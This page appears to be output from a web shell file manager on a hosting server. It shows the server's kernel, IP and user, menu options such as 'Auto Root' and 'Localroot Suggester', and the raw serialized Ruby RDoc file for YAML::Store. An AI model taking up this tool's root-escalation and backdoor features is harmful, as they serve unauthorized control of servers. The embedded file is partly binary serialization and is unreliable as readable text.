Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.45
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby32 /
share /
ri /
system /
YAML /
Store /
Delete
Unzip
Name
Size
Permission
Date
Action
cdesc-Store.ri
1.35
KB
-rw-r--r--
2026-04-07 17:42
new-c.ri
840
B
-rw-r--r--
2026-04-07 17:42
Save
Rename
U:RDoc::NormalClass[iI" Store:ETI"YAML::Store;TI"PStore;To:RDoc::Markup::Document:@parts[o;;[ o:RDoc::Markup::Paragraph;[I"PYAML::Store provides the same functionality as PStore, except it uses YAML ;TI"(to dump objects instead of Marshal.;To:RDoc::Markup::BlankLine S:RDoc::Markup::Heading: leveli: textI"Example;T@o:RDoc::Markup::Verbatim;[I"require 'yaml/store' ;TI" ;TI"1Person = Struct.new :first_name, :last_name ;TI" ;TI"Jpeople = [Person.new("Bob", "Smith"), Person.new("Mary", "Johnson")] ;TI" ;TI"*store = YAML::Store.new "test.store" ;TI" ;TI"store.transaction do ;TI" store["people"] = people ;TI"2 store["greeting"] = { "hello" => "world" } ;TI" end ;T:@format0o; ;[I"HAfter running the above code, the contents of "test.store" will be:;T@o;;[I" --- ;TI" people: ;TI"- !ruby/struct:Person ;TI" first_name: Bob ;TI" last_name: Smith ;TI"- !ruby/struct:Person ;TI" first_name: Mary ;TI" last_name: Johnson ;TI"greeting: ;TI" hello: world;T;0: @fileI"lib/yaml/store.rb;T:0@omit_headings_from_table_of_contents_below0;0;0[ [ [ [[I" class;T[[:public[ [:protected[ [:private[[I"new;TI"lib/yaml/store.rb;T[I" instance;T[[;[ [;[ [;[ [ [U:RDoc::Context::Section[i 0o;;[ ;0;0[I"lib/yaml/store.rb;T@2cRDoc::TopLevel